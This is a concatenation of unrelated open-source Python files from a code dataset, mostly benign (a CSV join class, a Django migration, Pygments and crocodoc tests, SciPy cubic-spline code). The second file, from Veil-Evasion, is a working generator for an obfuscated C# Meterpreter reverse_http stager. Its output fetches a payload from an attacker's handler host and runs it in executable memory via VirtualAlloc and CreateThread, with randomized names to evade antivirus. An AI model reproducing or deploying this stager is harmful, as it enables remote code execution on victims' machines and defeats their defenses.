        for undo_func in reversed(self.undo_stack):
            undo_func()

    def rollback_and_reraise(self, msg=None, **kwargs):
        """Rollback a series of actions then re-raise the exception.

        .. note:: (sirp) This should only be called within an
                  exception handler.
        """
        with excutils.save_and_reraise_exception():
            if msg:
                LOG.exception(msg, **kwargs)
            self._rollback()
def ensure_tree(path):
    """Create a directory (and any ancestor directories required)

    :param path: Directory to create
    """
    try:
        os.makedirs(path)
    except OSError as exc:
        # Anything other than "already exists" is a real failure.
        if exc.errno != errno.EEXIST:
            raise
        # EEXIST for a non-directory (e.g. a file) is also a failure.
        if not os.path.isdir(path):
            raise
| fengkaicnic/traffic | traffic/utils.py | Python | apache-2.0 | 44,222 |
"""
Custom-written pure c# meterpreter/reverse_http stager.
Uses basic variable renaming obfuscation.
Module built by @harmj0y
"""
from modules.common import helpers
from modules.common import encryption
import random
class Payload:
    """Generator for a pure-C# windows/meterpreter/reverse_http stager.

    Emits obfuscated C# source (all identifiers randomized per call)
    that fetches the Meterpreter stage over HTTP and injects it via
    VirtualAlloc/CreateThread -- no embedded shellcode.
    """
    def __init__(self):
        # required options
        self.description = "pure windows/meterpreter/reverse_http stager, no shellcode"
        self.language = "cs"
        self.extension = "cs"
        self.rating = "Excellent"
        # options we require user interaction for- format is {Option : [Value, Description]]}
        self.required_options = {"LHOST" : ["", "IP of the metasploit handler"],
                                 "LPORT" : ["8080", "Port of the metasploit handler"],
                                 "compile_to_exe" : ["Y", "Compile to an executable"],
                                 "use_arya" : ["N", "Use the Arya crypter"]}
    def generate(self):
        """Build and return the C# stager source as a single string.

        LHOST/LPORT are baked into the staging URL; every C# identifier
        is randomized.  Optionally wraps the result with the Arya
        crypter when use_arya is set.
        """
        # imports and namespace setup
        payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
        payloadCode += "namespace %s { class %s {\n" % (helpers.randomString(), helpers.randomString())
        # code for the randomString() function
        randomStringName = helpers.randomString()
        bufferName = helpers.randomString()
        charsName = helpers.randomString()
        # shuffled alphabet used by the generated C# random-string helper
        t = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
        random.shuffle(t)
        chars = ''.join(t)
        payloadCode += "static string %s(Random r, int s) {\n" %(randomStringName)
        payloadCode += "char[] %s = new char[s];\n"%(bufferName)
        payloadCode += "string %s = \"%s\";\n" %(charsName, chars)
        payloadCode += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" %(bufferName, charsName, charsName)
        payloadCode += "return new string(%s);}\n" %(bufferName)
        # code for the checksum8() function (metasploit URI checksum == 92)
        checksum8Name = helpers.randomString()
        payloadCode += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" %(checksum8Name)
        # code for the genHTTPChecksum() function
        genHTTPChecksumName = helpers.randomString()
        baseStringName = helpers.randomString()
        randCharsName = helpers.randomString()
        urlName = helpers.randomString()
        random.shuffle(t)
        randChars = ''.join(t)
        payloadCode += "static string %s(Random r) { string %s = \"\";\n" %(genHTTPChecksumName,baseStringName)
        payloadCode += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" %(baseStringName,randomStringName)
        payloadCode += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" %(randCharsName,randChars)
        payloadCode += "for (int j = 0; j < %s.Length; ++j) {\n" %(randCharsName)
        payloadCode += "string %s = %s + %s[j];\n" %(urlName,baseStringName,randCharsName)
        payloadCode += "if (%s(%s)) {return %s;}}} return \"9vXU\";}"%(checksum8Name,urlName, urlName)
        # code for getData() function (HTTP download of the stage)
        getDataName = helpers.randomString()
        strName = helpers.randomString()
        webClientName = helpers.randomString()
        sName = helpers.randomString()
        payloadCode += "static byte[] %s(string %s) {\n" %(getDataName,strName)
        payloadCode += "WebClient %s = new System.Net.WebClient();\n" %(webClientName)
        payloadCode += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" %(webClientName)
        payloadCode += "%s.Headers.Add(\"Accept\", \"*/*\");\n" %(webClientName)
        payloadCode += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" %(webClientName)
        payloadCode += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" %(webClientName)
        payloadCode += "byte[] %s = null;\n" %(sName)
        payloadCode += "try { %s = %s.DownloadData(%s);\n" %(sName, webClientName, strName)
        payloadCode += "if (%s.Length < 100000) return null;}\n" %(sName)
        payloadCode += "catch (WebException) {}\n"
        payloadCode += "return %s;}\n" %(sName)
        # code for the inject() function to inject shellcode
        injectName = helpers.randomString()
        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()
        payloadCode += "static void %s(byte[] %s) {\n" %(injectName, sName)
        payloadCode += "    if (%s != null) {\n" %(sName)
        payloadCode += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" %(funcAddrName, sName)
        payloadCode += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" %(sName,funcAddrName, sName)
        payloadCode += "        IntPtr %s = IntPtr.Zero;\n" %(hThreadName)
        payloadCode += "        UInt32 %s = 0;\n" %(threadIdName)
        payloadCode += "        IntPtr %s = IntPtr.Zero;\n" %(pinfoName)
        payloadCode += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" %(hThreadName, funcAddrName, pinfoName, threadIdName)
        payloadCode += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" %(hThreadName)
        # code for Main() to launch everything
        sName = helpers.randomString()
        randomName = helpers.randomString()
        payloadCode += "static void Main(){\n"
        payloadCode += "Random %s = new Random((int)DateTime.Now.Ticks);\n" %(randomName)
        payloadCode += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" %(sName, getDataName, self.required_options["LHOST"][0],self.required_options["LPORT"][0],genHTTPChecksumName,randomName)
        payloadCode += "%s(%s);}\n" %(injectName, sName)
        # get 12 random variables for the API imports
        r = [helpers.randomString() for x in xrange(12)]
        payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
        # optionally wrap the whole source with the Arya crypter
        if self.required_options["use_arya"][0].lower() == "y":
            payloadCode = encryption.arya(payloadCode)
        return payloadCode
| codercold/Veil-Evasion | modules/payloads/cs/meterpreter/rev_http.py | Python | gpl-3.0 | 6,639 |
import string, copy
def joinHeaders(first, second, joined, on):
    """Build joined.headers from both datasets' header lists.

    Headers of `second` (except the join column `on`) that collide with
    a header of `first` get a numeric suffix appended.  Returns a dict
    mapping each renamed header of `second` to its new name.
    """
    joined.headers = list(first.headers)
    mappedHeaders = {}
    for header in second.headers:
        if header == on:
            continue
        candidate = header
        suffix = 0
        # Keep appending suffixes until the name no longer collides.
        while candidate in first.headers:
            candidate = '{0}_{1}'.format(candidate, suffix)
            suffix += 1
        if suffix > 0:
            mappedHeaders[header] = candidate
        joined.headers.append(candidate)
    return mappedHeaders
def mergeRow(row, toMerge, mappedHeaders):
    """Copy every field of `toMerge` into `row`, renaming keys that
    appear in `mappedHeaders`."""
    for header, value in toMerge.items():
        key = mappedHeaders.get(header, header)
        row[key] = value
def mergeRows(first, second, joined, on, mappedHeaders):
    """Merge second.rows into a deep copy of first.rows, joining on `on`.

    Rows of `second` whose `on` value matches a row already present are
    merged into that row; unmatched rows are appended as new rows.
    Neither input dataset is modified.
    """
    joined.rows = copy.deepcopy(first.rows)
    for incoming in copy.deepcopy(second.rows):
        pivot = incoming[on]
        target = next((row for row in joined.rows if row[on] == pivot), None)
        if target is None:
            # No match: the incoming row becomes a brand new row.
            target = {}
            joined.rows.append(target)
        mergeRow(target, incoming, mappedHeaders)
class Dataset:
    """In-memory CSV-like table: a header list plus rows of dicts."""
    def __init__(self, filename = '', separator=',', header=True):
        # Missing/unreadable files silently yield an empty dataset.
        # When header is False, synthetic headers V0..Vn are generated
        # from the first row's width.
        self.headers = []
        self.rows = []
        try:
            infile = file(filename, 'r')
            if header:
                self.headers = infile.readline().strip().split(separator)
            for line in infile:
                row = line.strip().split(separator)
                if not header and not self.headers:
                    self.headers = ["V{0}".format(i) for i in range(len(row))]
                self.rows.append({self.headers[i]:row[i] for i in range(len(row))})
            infile.close()
        except IOError:
            pass
    def export(self, filename):
        """Write the dataset as comma-separated text, headers first."""
        outfile = file(filename, 'w')
        outfile.write(','.join(self.headers))
        for row in self.rows:
            outfile.write('\n')
            outfile.write(','.join([row[x] for x in self.headers]))
        outfile.close()
    def join(self, other, on):
        """Join self dataset with another dataset, creating a new dataset.
        The original datasets remain unchanged.
        The third argument is the header on which to join"""
        # check for correct join
        if not (on in self.headers or on in other.headers):
            print "Error: header '{0}' not found in both collections".format(on)
            return None
        # create new dataset
        joined = Dataset()
        # fill new dataset with combined data
        mappedHeaders = joinHeaders(self, other, joined, on)
        mergeRows(self, other, joined, on, mappedHeaders)
        joined.ensureFilled()
        # return newly created dataset
        return joined
    def pivot(self):
        """Pivot this dataset into a new one, discarding current headers, using first column as new headers"""
        pivoted = Dataset()
        for (index, header) in enumerate(self.headers):
            for row in self.rows:
                if index == 0:
                    # Values of the first column become the new headers.
                    pivoted.headers.append(row[header])
                else:
                    if len(pivoted.rows) < index:
                        # Grow the row list lazily: one dict per source column.
                        pivoted.rows.extend([{} for x in range(index - len(pivoted.rows))])
                    pivoted.rows[index - 1][row[self.headers[0]]] = row[header]
        return pivoted
    def ensureFilled(self):
        """Guarantee every row has every header; missing values become None."""
        for row in self.rows:
            for header in self.headers:
                if not header in row:
                    row[header] = None
    def append(self, other, ensureFilled = True):
        """Append rows of another dataset to this one, leaving the other dataset unchanged"""
        self.rows.extend(other.rows)
        self.headers.extend([x for x in other.headers if not x in self.headers])
        if(ensureFilled):
            self.ensureFilled()
        return self
| dwilmer/rcpsp-testing-framework | dataset.py | Python | mit | 3,291 |
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import cPickle
from webkitpy.layout_tests.models import test_failures
class TestResult(object):
    """Data object containing the results of a single test."""

    @staticmethod
    def loads(string):
        """Deserialize a TestResult previously produced by dumps()."""
        return cPickle.loads(string)

    def __init__(self, test_name, failures=None, test_run_time=None, has_stderr=False, reftest_type=None):
        self.test_name = test_name
        self.failures = failures or []
        self.test_run_time = test_run_time or 0
        self.has_stderr = has_stderr
        # NOTE: the default used to be the mutable literal [], which is
        # shared across every call; use None and a fresh list instead.
        self.reftest_type = reftest_type or []

        # FIXME: Setting this in the constructor makes this class hard to mutate.
        self.type = test_failures.determine_result_type(failures)

    def __eq__(self, other):
        return (self.test_name == other.test_name and
                self.failures == other.failures and
                self.test_run_time == other.test_run_time)

    def __ne__(self, other):
        return not (self == other)

    def has_failure_matching_types(self, *failure_classes):
        """Return True if any recorded failure is exactly one of the given types."""
        for failure in self.failures:
            if type(failure) in failure_classes:
                return True
        return False

    def dumps(self):
        """Serialize this result with cPickle for cross-process transport."""
        return cPickle.dumps(self)
| leighpauls/k2cro4 | third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/models/test_results.py | Python | bsd-3-clause | 2,739 |
import numpy as np
from arthur import constants
def grid(U, V, C, duv, size):
    """Grid correlations C at uv coordinates (U, V) onto a complex grid.

    :param U: (NUM_ANTS, NUM_ANTS) u coordinates per antenna pair
    :param V: (NUM_ANTS, NUM_ANTS) v coordinates per antenna pair
    :param C: (NUM_ANTS, NUM_ANTS) complex correlations
    :param duv: uv cell size used to scale coordinates to pixels
    :param size: output grid dimension
    :returns: (size, size) np.complex64 array with bilinearly-weighted
              contributions accumulated per pair
    """
    # np.zeros already yields a zero-initialized array; the extra
    # G.fill(0) the original performed was redundant.
    G = np.zeros((size, size), np.complex64)
    for a1 in range(constants.NUM_ANTS):
        for a2 in range(constants.NUM_ANTS):
            # Autocorrelations get half weight; cross-correlations appear
            # for both (a1, a2) and (a2, a1).
            p = 0.5 if a1 == a2 else 1.0

            # Fractional pixel position of this baseline.
            u = U[a1, a2] / duv + size / 2 - 1
            v = V[a1, a2] / duv + size / 2 - 1

            # Enclosing pixel corners: west/east along u, south/north along v.
            w = int(np.floor(u))
            e = int(np.ceil(u))
            s = int(np.floor(v))
            n = int(np.ceil(v))

            # Bilinear weights, scaled by the pair weight p.
            west_power = p - (u - w)
            east_power = p - (e - u)
            south_power = p - (v - s)
            north_power = p - (n - v)

            south_west_power = south_power * west_power
            north_west_power = north_power * west_power
            south_east_power = south_power * east_power
            north_east_power = north_power * east_power

            # NOTE(review): when u (or v) is exactly integral, floor == ceil
            # and the same cell is accumulated twice -- verify intended.
            G[s, w] += south_west_power * C[a1, a2]
            G[n, w] += north_west_power * C[a1, a2]
            G[s, e] += south_east_power * C[a1, a2]
            G[n, e] += north_east_power * C[a1, a2]
    return G
| transientskp/aartfaac-arthur | arthur/gridding.py | Python | gpl-3.0 | 1,118 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012, 2014, 2015 Martin Raspaud
# Author(s):
# Martin Raspaud <martin.raspaud@smhi.se>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Version file.
"""
__version__ = "0.2.0"
| pytroll/pytroll-db | trolldb/version.py | Python | gpl-3.0 | 832 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.21 on 2020-04-15 08:10
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration: adds the AnotacionGrupo model
    # (a dated, free-text annotation attached to a Grupo by a user).

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('gestioneide', '0065_auto_20200403_1657'),
    ]

    operations = [
        migrations.CreateModel(
            name='AnotacionGrupo',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Creation date, set automatically on insert.
                ('fecha', models.DateField(auto_now_add=True)),
                # NOTE(review): default=b'' is a bytes default on a CharField
                # (Python-2-era artifact) -- confirm intended.
                ('texto', models.CharField(default=b'', max_length=1000)),
                # NOTE(review): field is named 'alumno' but targets Grupo --
                # looks copy-pasted from an AnotacionAlumno model; confirm.
                ('alumno', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='gestioneide.Grupo')),
                ('creador', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                # Newest annotations first.
                'ordering': ['-fecha'],
            },
        ),
    ]
| Etxea/gestioneide | gestioneide/migrations/0066_anotaciongrupo.py | Python | gpl-3.0 | 1,119 |
#!/usr/bin/env python
"""Test that syntax highlighting for USD files works correctly."""
import textwrap
import unittest
from pygments.lexers import UsdLexer
from pygments.token import Name, String, Whitespace
class _Common(unittest.TestCase):
    """Base class giving each test a fresh USD lexer and a tokenize helper."""

    def setUp(self):
        """Create a fresh USD lexer instance before each test runs."""
        self.lexer = UsdLexer()

    def _get(self, code):
        """Tokenize the code into its unique parts.

        :param code: The USD source code to split up.
        :type code: str

        :returns: The tokenized (token type, text) pairs.
        :rtype: list[tuple]
        """
        return list(self.lexer.get_tokens(code))
class Features(_Common):
    """Test that different features of USD highlight as expected."""

    def test_asset_path(self):
        """Check that a regular file path highlights correctly."""
        for path in [
            "@./some/path/to/a/file/foo.usda@",
            "@/some/path/to/a/file/foo.usda@",
            "@some/path/to/a/file/foo.usda@",
            r"@file://SPECI__Z-_ALIZED(syntax_here)?with_arbitrary#)(%*&)\characters.tar.gz@",
        ]:
            # The @...@ asset path lexes as one String.Interpol token,
            # plus the trailing newline the lexer always emits.
            expected = [
                (String.Interpol, path),
                (Whitespace, "\n"),
            ]
            self.assertEqual(expected, self._get(path))

    def test_target_absolute(self):
        """Check that SdfPath syntax examples work correctly."""
        for code in [
            # Absolute paths
            "</some/another_one/here>",
            "</some/path/here.property_name>",
            "</some/path/here>",
            # Relative paths
            "<../some/another_one/here>",
            "<../some/path/here.property_name>",
            "<../some/path/here>",
        ]:
            # Each <...> prim/property path lexes as one Name.Namespace token.
            self.assertEqual(
                [(Name.Namespace, code), (Whitespace, "\n")], self._get(code),
            )
| dscorbett/pygments | tests/test_usd.py | Python | bsd-2-clause | 1,953 |
# -*- coding: utf-8 -*-
"""
Webhook signals
"""
#
# Required for reading files
#
import sys;
reload(sys);
sys.setdefaultencoding("utf8")
from django.core.files import File
from django.core.cache import cache
from django.dispatch import receiver
from django.test import TestCase, Client
from django.core.urlresolvers import reverse_lazy
from django.contrib.contenttypes.models import ContentType
from model_mommy import mommy
from ..services import CrocoDocConnectService
from .models import FakeDocumentObject
import data as crocodoc_data
from dj_crocodoc.models import CrocodocDocument
import dj_crocodoc.signals as crocodoc_signals
import os
import json
import codecs
import httpretty
TEST_PDF_PATH = os.path.join(os.path.dirname(__file__), 'test.pdf')
def GET_FAKE_DOC_OBJECT():
    """Create and save a FakeDocumentObject with the test PDF attached.

    The PDF is read as ISO8859-1 text and stored through the model's
    FileField, so tests have a realistic persisted attachment.
    """
    base_object_attachment = FakeDocumentObject()
    with codecs.open(TEST_PDF_PATH, mode='r', encoding="ISO8859-1") as filename:
        base_object_attachment.my_document_field.save('test.pdf', File(filename))
    base_object_attachment.save()
    return base_object_attachment
@receiver(crocodoc_signals.crocodoc_comment_create)
@receiver(crocodoc_signals.crocodoc_comment_delete)
@receiver(crocodoc_signals.crocodoc_annotation_highlight)
@receiver(crocodoc_signals.crocodoc_annotation_strikeout)
@receiver(crocodoc_signals.crocodoc_annotation_textbox)
@receiver(crocodoc_signals.crocodoc_annotation_drawing)
def test_crocodoc_webhook_event_recieved(**kwargs):
    """Signal listener that records the received kwargs' keys in the cache.

    Connected to every crocodoc signal; the webhook tests below read the
    cached key list to assert which payload keys each signal carried.
    """
    cache.set('test_crocodoc_webhook_event_recieved', kwargs.keys())
def _ensure_object_has_correct_values(clazz, obj):
    """Shared assertions used by several tests below.

    Checks that `obj` (a CrocodocDocument) references the fake
    attachment content type, the expected field name, and resolves its
    source object back to a FakeDocumentObject.
    """
    clazz.assertEqual(obj.content_object_type, ContentType.objects.get(model='fakedocumentobject', app_label='tests'))
    clazz.assertEqual(obj.object_attachment_fieldname, 'my_document_field')
    clazz.assertEqual(type(obj.source_object), FakeDocumentObject) # should return the base object that created the request
class BaseContentProvider(TestCase):
    """Shared fixture: a test client, user, fake attachment and document."""
    def setUp(self):
        super(BaseContentProvider, self).setUp()
        self.client = Client()
        self.document_uuid = 'b15532bb-c227-40f6-939c-a244d123c717'
        #
        # Create Test document
        #
        self.user = mommy.make('auth.User',
                               pk=1,  # set pk based on the data.CROCODOC_COMMENT_CREATE 1,Ross C
                               username='CrocoDoc webhook User',
                               first_name='Ross',
                               last_name='C',
                               email='crocodoc@lawpal.com')
        self.attachment = FakeDocumentObject.objects.create(my_document_field='')
        # Resolve the content type dynamically from the attachment class.
        ctype = ContentType.objects.get(model=self.attachment.__class__.__name__.lower(), app_label='tests')
        self.doc = CrocodocDocument.objects.create(uuid=self.document_uuid,
                                                   content_object_type=ctype,
                                                   object_id=self.attachment.pk,
                                                   object_attachment_fieldname='my_document_field')
class WebhookTest(BaseContentProvider):
    """
    Test the basic webhook callbacks (emulate a POST from crocodoc)
    """
    endpoint = reverse_lazy('crocodoc_webhook_callback')
    # Keys every emitted signal is expected to carry.
    EXPECTED_KEYS = ['target', 'crocodoc_event', 'signal', 'uuid', 'content', 'user_info', 'verb', 'attachment_name', 'document', 'sender']
    def send(self, data):
        """POST `data` to the callback endpoint, wrapped in the "payload"
        form field crocodoc uses for all webhooks."""
        return self.client.post(self.endpoint, {"payload": json.dumps(data)})
    def test_comment_create(self):
        resp = self.send(data=crocodoc_data.CROCODOC_COMMENT_CREATE)
        self.assertItemsEqual(cache.get('test_crocodoc_webhook_event_recieved'), self.EXPECTED_KEYS)
        # NOTE(review): two booleans here, presumably one per handled event
        # in the comment-create payload -- confirm against the view.
        self.assertEqual(json.loads(resp.content), {"details": [True, True]})
    def test_annotation_highlight(self):
        resp = self.send(data=crocodoc_data.CROCODOC_ANNOTATION_HIGHLIGHT)
        self.assertItemsEqual(cache.get('test_crocodoc_webhook_event_recieved'), self.EXPECTED_KEYS)
        self.assertEqual(json.loads(resp.content), {"details": [True]})
    def test_annotation_textbox(self):
        resp = self.send(data=crocodoc_data.CROCODOC_ANNOTATION_TEXTBOX)
        self.assertItemsEqual(cache.get('test_crocodoc_webhook_event_recieved'), self.EXPECTED_KEYS)
        self.assertEqual(json.loads(resp.content), {"details": [True]})
class IncomingSignalTest(TestCase):
    """
    Test we can issue a signal and have that signal provide us with an appropriate model
    """
    subject = crocodoc_signals.send_to_crocodoc
    @httpretty.activate
    def test_signal_provides_a_new_model(self):
        #
        # Crocodoc upload endpoint is stubbed so no real network traffic occurs
        #
        httpretty.register_uri(httpretty.POST, "https://crocodoc.com/api/v2/document/upload",
                               body='{"success": true, "uuid": "b15532bb-c227-40f6-939c-a244d123c717"}',
                               status=200)
        base_object_attachment = GET_FAKE_DOC_OBJECT()
        self.assertEqual(CrocodocDocument.objects.all().count(), 0)
        self.subject.send(sender=self,
                          document_object=base_object_attachment,
                          app_label='tests',
                          field_name='my_document_field')
        # Success, we Created a new CrocodocDocument object from the signal
        self.assertEqual(CrocodocDocument.objects.all().count(), 1)
        obj = CrocodocDocument.objects.all().first()
        # The signal path uploads immediately, so the uuid is populated.
        self.assertEqual(str(obj.uuid), 'b15532bb-c227-40f6-939c-a244d123c717')
        _ensure_object_has_correct_values(clazz=self, obj=obj)
class CrocoDocConnectServiceTest(TestCase):
    """
    Test we can use the CrocoDocConnectService directly
    """
    subject = CrocoDocConnectService
    @httpretty.activate
    def test_service_provides_a_model_with_upload_immediately_false(self):
        """
        Note the CrocoDocConnectService will not upload_immediately unless you
        specify upload_immediately=True
        """
        #
        # Crocodoc upload endpoint stubbed (should not actually be hit here)
        #
        httpretty.register_uri(httpretty.POST, "https://crocodoc.com/api/v2/document/upload",
                               body='{"success": true, "uuid": "b15532bb-c227-40f6-939c-a244d123c717"}',
                               status=200)
        base_object_attachment = GET_FAKE_DOC_OBJECT()
        self.assertEqual(CrocodocDocument.objects.all().count(), 0)
        self.subject(document_object=base_object_attachment, app_label='tests', field_name='my_document_field')
        # Success, we Created a new CrocodocDocument object from the signal
        self.assertEqual(CrocodocDocument.objects.all().count(), 1)
        obj = CrocodocDocument.objects.all().first()
        self.assertEqual(obj.uuid, None)  # Service does not upload right away
        _ensure_object_has_correct_values(clazz=self, obj=obj)
    @httpretty.activate
    def test_service_provides_a_model_with_upload_immediately_true(self):
        """
        With upload_immediately=True the service uploads at construction
        time and the model's uuid is populated from the stubbed response.
        """
        #
        # Crocodoc upload endpoint stubbed
        #
        httpretty.register_uri(httpretty.POST, "https://crocodoc.com/api/v2/document/upload",
                               body='{"success": true, "uuid": "b15532bb-c227-40f6-939c-a244d123c717"}',
                               status=200)
        base_object_attachment = GET_FAKE_DOC_OBJECT()
        self.assertEqual(CrocodocDocument.objects.all().count(), 0)
        service = self.subject(document_object=base_object_attachment,
                               app_label='tests',
                               field_name='my_document_field',
                               upload_immediately=True)
        # Success, we Created a new CrocodocDocument object from the signal
        self.assertEqual(CrocodocDocument.objects.all().count(), 1)
        obj = CrocodocDocument.objects.all().first()
        # uuid comes from the stubbed upload response.
        self.assertEqual(str(obj.uuid), 'b15532bb-c227-40f6-939c-a244d123c717')
        _ensure_object_has_correct_values(clazz=self, obj=obj)
| rosscdh/django-crocodoc | dj_crocodoc/tests/signals.py | Python | gpl-2.0 | 8,364 |
"""Interpolation algorithms using piecewise cubic polynomials."""
import numpy as np
from . import PPoly
from .polyint import _isscalar
from scipy.linalg import solve_banded, solve
__all__ = ["CubicHermiteSpline", "PchipInterpolator", "pchip_interpolate",
"Akima1DInterpolator", "CubicSpline"]
def prepare_input(x, y, axis, dydx=None):
    """Prepare input for cubic spline interpolators.

    All data are converted to numpy arrays and checked for correctness.
    Axes equal to `axis` of arrays `y` and `dydx` are rolled to be the 0th
    axis. The value of `axis` is converted to lie in
    [0, number of dimensions of `y`).
    """
    x, y = map(np.asarray, (x, y))
    if np.issubdtype(x.dtype, np.complexfloating):
        raise ValueError("`x` must contain real values.")
    x = x.astype(float)

    # The working dtype is complex as soon as y (or dydx) is complex.
    dtype = complex if np.issubdtype(y.dtype, np.complexfloating) else float

    if dydx is not None:
        dydx = np.asarray(dydx)
        if y.shape != dydx.shape:
            raise ValueError("The shapes of `y` and `dydx` must be identical.")
        if np.issubdtype(dydx.dtype, np.complexfloating):
            dtype = complex
        dydx = dydx.astype(dtype, copy=False)

    y = y.astype(dtype, copy=False)
    # Normalize axis into [0, y.ndim).
    axis = axis % y.ndim

    if x.ndim != 1:
        raise ValueError("`x` must be 1-dimensional.")
    if x.shape[0] < 2:
        raise ValueError("`x` must contain at least 2 elements.")
    if x.shape[0] != y.shape[axis]:
        raise ValueError("The length of `y` along `axis`={0} doesn't "
                         "match the length of `x`".format(axis))

    if not np.all(np.isfinite(x)):
        raise ValueError("`x` must contain only finite values.")
    if not np.all(np.isfinite(y)):
        raise ValueError("`y` must contain only finite values.")
    if dydx is not None and not np.all(np.isfinite(dydx)):
        raise ValueError("`dydx` must contain only finite values.")

    dx = np.diff(x)
    if np.any(dx <= 0):
        raise ValueError("`x` must be strictly increasing sequence.")

    # Move the interpolation axis to the front for the interpolators.
    y = np.rollaxis(y, axis)
    if dydx is not None:
        dydx = np.rollaxis(dydx, axis)

    return x, dx, y, axis, dydx
class CubicHermiteSpline(PPoly):
    """Piecewise-cubic interpolator matching values and first derivatives.

    The result is represented as a `PPoly` instance.

    Parameters
    ----------
    x : array_like, shape (n,)
        1-D array of independent-variable values; must be real, finite
        and strictly increasing.
    y : array_like
        Values of the dependent variable. Arbitrary dimensionality is
        allowed, but the length along ``axis`` must match ``len(x)`` and
        all values must be finite.
    dydx : array_like
        First derivatives of the dependent variable; same layout rules
        as `y`.
    axis : int, optional
        Axis of `y` along which the data vary, i.e. the values at ``x[i]``
        are ``np.take(y, i, axis=axis)``. Default is 0.
    extrapolate : {bool, 'periodic', None}, optional
        Out-of-bounds behavior: a bool selects extrapolation from the end
        intervals (True) or NaN (False); 'periodic' wraps around; None
        (the default) is treated as True.

    Attributes
    ----------
    x : ndarray, shape (n,)
        Breakpoints -- the same ``x`` passed to the constructor.
    c : ndarray, shape (4, n-1, ...)
        Segment coefficients; ``c[k, i]`` multiplies ``(x - x[i])**(3-k)``
        on the segment between ``x[i]`` and ``x[i+1]``. Trailing dimensions
        match those of `y` excluding ``axis``.
    axis : int
        Interpolation axis, as passed to the constructor.

    Methods
    -------
    __call__
    derivative
    antiderivative
    integrate
    roots

    See Also
    --------
    Akima1DInterpolator : Akima 1D interpolator.
    PchipInterpolator : PCHIP 1-D monotonic cubic interpolator.
    CubicSpline : Cubic spline data interpolator.
    PPoly : Piecewise polynomial in terms of coefficients and breakpoints

    Notes
    -----
    To build a higher-order spline matching higher-order derivatives, use
    `BPoly.from_derivatives`.

    References
    ----------
    .. [1] `Cubic Hermite spline
           <https://en.wikipedia.org/wiki/Cubic_Hermite_spline>`_
           on Wikipedia.
    """
    def __init__(self, x, y, dydx, axis=0, extrapolate=None):
        if extrapolate is None:
            extrapolate = True
